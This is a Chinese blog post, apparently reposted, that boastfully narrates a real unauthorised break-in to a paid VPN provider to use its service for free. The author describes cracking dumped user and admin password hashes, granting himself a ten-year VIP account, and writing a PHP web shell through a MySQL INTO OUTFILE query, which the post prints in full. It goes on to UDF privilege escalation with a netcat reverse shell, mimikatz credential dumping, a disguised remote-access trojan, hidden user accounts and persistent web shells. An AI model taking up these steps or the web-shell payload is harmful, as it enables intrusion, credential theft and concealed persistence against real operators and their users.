黑客:一次白嫖翻Wall经历

写在前面

文章概要

分享一次Web渗透经历。大概讲述的是一个渣渣程序员,凭借运气的加持,经过不懈的尝试和努力,最终拿下某翻Wall运营商,走上人生巅峰的故事!

同时本文将以PPT的形式进行展现和概述,通篇不会很详细,旨在通过一次渗透经历让大家认识到Web渗透的一些攻击手段!

文章目录

本次攻击大概分为五个过程,包括信息收集漏洞挖掘后台攻入爆破提权以及后门远控

攻击目标

XX翻Wall运营商(收费)

攻击目的

目的很简单,也很单纯:想白嫖,免费翻Wall~

信息收集

信息收集渠道很多,如子域名挖掘whoisnmap指纹识别等等。网上也有很多文章介绍,如:https://blog.csdn.net/Eastmount/article/details/102816621,这里就不一一介绍了。

收集结果如下,目前看用处不大!

漏洞挖掘

漏洞扫描工具,像AppScanAWVSNessus这些开源,且用的比较多,也还有很多其他扫描工具,如:Ladon(github.com/k8gege/Lado…

同样网上也有很多文章介绍,如:https://blog.csdn.net/MyPC2010/article/details/77679760?locationNum=5&fps=1,这里也不详细介绍了。

扫描结果如下,目前看用处也不大!

SqlMap跑一下,也没有什么成效:

网站目录扫描一下,找到一些好东西:

后台攻入

既然拿到了源码,那么代码审计一波,拿到下面这些有用的资料:

数据库导入到本地MySQL:

好家伙,这应该就是该翻Wall软件的用户表了,可惜密码是MD5的~,如果破·解了应该就可以用这些账号密码去白嫖登录了。尝试彩虹爆破一波:

整理到excel:

并且意外收获是:管理员账号和密码被破·解出来了!这下就可以尝试登录后台了,如下(登录注意隐藏脚印,使用洋葱浏览器或者高匿代理等):

那肯定要给自己加一个VIP咯:

无限续费,先续个10年吧:

别说,谷歌、YouTube速度还挺快的:

另外发现后台管理没有图片、文件的上传机会,即无法上传网马提权

爆破提权

期间遇到了四个麻烦问题。

麻烦一

扫描敏感文件,查得phpinfo

如图网站部署在c盘的wwwroot子目录下,那么只需执行:

select'<?php @eval($_POST['pwd']);?>'intooutfile'C://inetpub//wwwroot//shell.php';

即可将一句话网马写入到网站根目录。

麻烦二

麻烦三

麻烦四

写入udf.dll到目标机器,并反弹2018端口,等待NC连接:

我的本地电脑使用NC连接到目标机器,并添加登录用户和密码:

具体udf提权方式网上一大堆,这里也不讲了。

然后就可以远程连接目标机器了,使用mimikatz获取目标机器的administrator用户密码:

后门远控

远控工具就太多了,灰鸽子QuasarRATgh0stRAT冰河JBiFrostRATNanoCore上兴远控RemcosRATPCShare……

我这里使用的就是常见的灰鸽子,首先使用灰鸽子生成好要放到目标机器上去的远控马,然后如下,简单伪装一下,再运行:

主机上线:

留下隐身账户,以下方式可创建隐身用户,受害者无法发现该隐身用户的存在:

木马程序可能会被360、卡巴等查杀,或者无法穿透一些防火墙屏蔽的端口,所以网马还是需要留下的(最好是僵尸马,杀不死那种):

最后,文章到这里就算结束了,希望通过本文让你对Web渗透有一些入门认识,感谢您的阅读 ,下期再会 ~

以上是 黑客:一次白嫖翻Wall经历 的全部内容, 来源链接: utcz.com/a/31369.html

回到顶部